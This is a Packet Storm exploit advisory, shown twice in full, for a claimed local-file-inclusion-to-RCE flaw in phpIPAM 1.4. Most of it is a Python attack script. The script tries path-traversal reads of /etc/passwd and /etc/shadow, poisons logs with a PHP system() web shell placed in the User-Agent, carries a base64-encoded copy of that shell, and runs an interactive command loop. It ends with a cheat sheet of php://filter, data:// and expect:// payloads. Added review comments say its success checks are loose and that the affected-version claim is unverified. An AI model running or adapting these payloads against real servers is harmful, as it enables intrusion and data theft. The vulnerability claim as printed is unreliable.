Description
A critical local file inclusion vulnerability exists in index.php in phpIPAM version 1.4. Attackers can exploit this to read sensitive system files and potentially perform remote code execution...
Basic Information
ID
PACKETSTORM:215599
Published
Feb 16, 2026 at 00:00
Affected Product
Affected Versions
phpIPAM 1.4 LFI to RCE Exploit
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
and gain complete control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
# Client wrapper that holds the target base URL and one shared requests.Session.
# NOTE(review): the only phpIPAM-specific details in this listing are the
# index.php path and the `page` parameter name; the page cites no CVE, no
# vulnerable code from index.php and no fixed release, so the "1.4 is affected"
# claim should be confirmed against the project's source before triage.
class phpIPAM_Exploit:
def __init__(self, target):
# Trailing slashes are stripped so later f-strings can append "/index.php".
self.target = target.rstrip('/')
# One Session is reused for every request made by the methods below.
self.session = requests.Session()
def check_lfi(self, path):
"""Send one GET to <target>/index.php with `path` as the `page` query parameter.

Returns the raw requests response; no interpretation of the body happens here.
"""
# Detection: every probe in this listing goes through this request shape, so
# traversal sequences in the `page` parameter of index.php are the artefact
# to look for in web-server access logs.
params = {'page': path}
# No timeout and no exception handling: a connection error propagates to the caller.
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""Log-poisoning attempt: send a PHP snippet as User-Agent, then request log paths.

Returns True as soon as the follow-up request for any path answers with
HTTP 200, otherwise False. Despite the name, four of the five paths tried
are not /proc/self/environ.
"""
print("[*] Testing /proc/self/environ LFI...")
# First: inject PHP into the User-Agent.
# Detection: a PHP open tag in the User-Agent field of an access log is the
# trace this request leaves behind.
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
# The response to this request is overwritten inside the loop and never inspected.
response = self.session.get(self.target, headers=headers)
# Second: include the log file.
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
# Each entry already starts with '/', so the value sent contains '//' after the prefix.
response = self.check_lfi(f"../../../../{path}")
# NOTE(review): the only evidence required here is the substring 'PHP'/'php'
# somewhere in the body; presumably an ordinary page of a PHP application
# satisfies that too, so this branch does not show that a file was included.
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# Test command execution.
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
# NOTE(review): success is reported on status 200 alone; the body is never
# examined for command output, so "RCE successful!" is not evidence of
# code execution on the target.
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""Probe numbered /tmp file names through the `page` parameter.

Original note: upload and include a temporary file (if file upload exists).
Returns the first file name whose response matches the markers below, else None.
"""
# Original note: this also requires a file-upload vulnerability.
# NOTE(review): nothing is uploaded anywhere in this method; `php_code` and
# `shell` are never used, and no visible caller in this listing invokes it.
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded
# (the string literal below is split across two lines in this listing)
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# Attempt to include /tmp files.
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
# '*' is replaced by the integers 0..99, giving 300 requests in total.
for i in range(100):
filename = pattern.replace('*', str(i))
response = self.check_lfi(f"../../../../{filename}")
# NOTE(review): matching the word 'root' anywhere in the lower-cased body is
# a loose marker; a hit here is not proof that a temp file was included.
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: {filename}")
return filename
return None
def interactive_shell(self, lfi_path):
"""Prompt loop that re-requests `lfi_path` with each typed line as the `cmd` parameter.

Original note: interactive shell after exploitation. Returns None when the
user types 'exit'.
"""
# NOTE(review): run() passes the path of the file that matched its read test
# (for example etc/passwd), so each iteration requests that same file again
# with an extra `cmd` parameter; nothing in this method verifies that the
# parameter is executed.
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
# Detection: index.php requests carrying both `page` and `cmd` parameters.
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# Extract the output: print lines that do not start with '<' and do not mention 'html'.
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # print the first 500 characters
def run(self):
"""Run the checks in order: file-read probes first, then the log-poisoning attempt.

Returns True if either stage reports a hit, False otherwise.
"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# Basic LFI test.
# Detection: these literal `page` values ('../' chains, '....//' and '..\'
# variants ending in etc/passwd, etc/hosts or win.ini) are what a WAF rule or
# access-log search for this script would key on.
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
# Markers: 'root:' for a passwd file, '[extensions]' for win.ini; the etc/hosts
# probe has no marker of its own.
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# Direct exploitation: hand the matched path to the prompt loop.
# replace() only strips the plain '../../../../' prefix; the '....//' and
# backslash variants are passed on unchanged.
self.interactive_shell(test.replace('../../../../', ''))
return True
# Other attempts.
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# Manual exploitation
# Prints a static text block and returns None; it makes no network requests
# and takes no input.
# NOTE(review): the listed request forms are generic file-inclusion patterns;
# items 3-5 are themselves marked as depending on server configuration, and
# nothing on this page shows which of them, if any, phpIPAM 1.4 accepts.
def manual_exploitation():
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
# Script entry point: expects exactly one argument, the target base URL.
if __name__ == "__main__":
# Wrong argument count: print usage plus the static text block, then exit with status 1.
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
# The URL is used as given; no scheme or host validation is performed.
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
# The boolean returned by run() is discarded, so the exit status does not reflect the result.
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
and gain complete control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
# Client wrapper that holds the target base URL and one shared requests.Session.
# NOTE(review): the only phpIPAM-specific details in this listing are the
# index.php path and the `page` parameter name; the page cites no CVE, no
# vulnerable code from index.php and no fixed release, so the "1.4 is affected"
# claim should be confirmed against the project's source before triage.
class phpIPAM_Exploit:
def __init__(self, target):
# Trailing slashes are stripped so later f-strings can append "/index.php".
self.target = target.rstrip('/')
# One Session is reused for every request made by the methods below.
self.session = requests.Session()
def check_lfi(self, path):
"""Send one GET to <target>/index.php with `path` as the `page` query parameter.

Returns the raw requests response; no interpretation of the body happens here.
"""
# Detection: every probe in this listing goes through this request shape, so
# traversal sequences in the `page` parameter of index.php are the artefact
# to look for in web-server access logs.
params = {'page': path}
# No timeout and no exception handling: a connection error propagates to the caller.
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""Log-poisoning attempt: send a PHP snippet as User-Agent, then request log paths.

Returns True as soon as the follow-up request for any path answers with
HTTP 200, otherwise False. Despite the name, four of the five paths tried
are not /proc/self/environ.
"""
print("[*] Testing /proc/self/environ LFI...")
# First: inject PHP into the User-Agent.
# Detection: a PHP open tag in the User-Agent field of an access log is the
# trace this request leaves behind.
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
# The response to this request is overwritten inside the loop and never inspected.
response = self.session.get(self.target, headers=headers)
# Second: include the log file.
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
# Each entry already starts with '/', so the value sent contains '//' after the prefix.
response = self.check_lfi(f"../../../../{path}")
# NOTE(review): the only evidence required here is the substring 'PHP'/'php'
# somewhere in the body; presumably an ordinary page of a PHP application
# satisfies that too, so this branch does not show that a file was included.
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# Test command execution.
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
# NOTE(review): success is reported on status 200 alone; the body is never
# examined for command output, so "RCE successful!" is not evidence of
# code execution on the target.
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""Probe numbered /tmp file names through the `page` parameter.

Original note: upload and include a temporary file (if file upload exists).
Returns the first file name whose response matches the markers below, else None.
"""
# Original note: this also requires a file-upload vulnerability.
# NOTE(review): nothing is uploaded anywhere in this method; `php_code` and
# `shell` are never used, and no visible caller in this listing invokes it.
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded
# (the string literal below is split across two lines in this listing)
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# Attempt to include /tmp files.
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
# '*' is replaced by the integers 0..99, giving 300 requests in total.
for i in range(100):
filename = pattern.replace('*', str(i))
response = self.check_lfi(f"../../../../{filename}")
# NOTE(review): matching the word 'root' anywhere in the lower-cased body is
# a loose marker; a hit here is not proof that a temp file was included.
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: {filename}")
return filename
return None
def interactive_shell(self, lfi_path):
"""Prompt loop that re-requests `lfi_path` with each typed line as the `cmd` parameter.

Original note: interactive shell after exploitation. Returns None when the
user types 'exit'.
"""
# NOTE(review): run() passes the path of the file that matched its read test
# (for example etc/passwd), so each iteration requests that same file again
# with an extra `cmd` parameter; nothing in this method verifies that the
# parameter is executed.
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
# Detection: index.php requests carrying both `page` and `cmd` parameters.
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# Extract the output: print lines that do not start with '<' and do not mention 'html'.
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # print the first 500 characters
def run(self):
"""Run the checks in order: file-read probes first, then the log-poisoning attempt.

Returns True if either stage reports a hit, False otherwise.
"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# Basic LFI test.
# Detection: these literal `page` values ('../' chains, '....//' and '..\'
# variants ending in etc/passwd, etc/hosts or win.ini) are what a WAF rule or
# access-log search for this script would key on.
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
# Markers: 'root:' for a passwd file, '[extensions]' for win.ini; the etc/hosts
# probe has no marker of its own.
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# Direct exploitation: hand the matched path to the prompt loop.
# replace() only strips the plain '../../../../' prefix; the '....//' and
# backslash variants are passed on unchanged.
self.interactive_shell(test.replace('../../../../', ''))
return True
# Other attempts.
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# Manual exploitation
# Prints a static text block and returns None; it makes no network requests
# and takes no input.
# NOTE(review): the listed request forms are generic file-inclusion patterns;
# items 3-5 are themselves marked as depending on server configuration, and
# nothing on this page shows which of them, if any, phpIPAM 1.4 accepts.
def manual_exploitation():
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
# Script entry point: expects exactly one argument, the target base URL.
if __name__ == "__main__":
# Wrong argument count: print usage plus the static text block, then exit with status 1.
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
# The URL is used as given; no scheme or host validation is performed.
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
# The boolean returned by run() is discarded, so the exit status does not reflect the result.
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================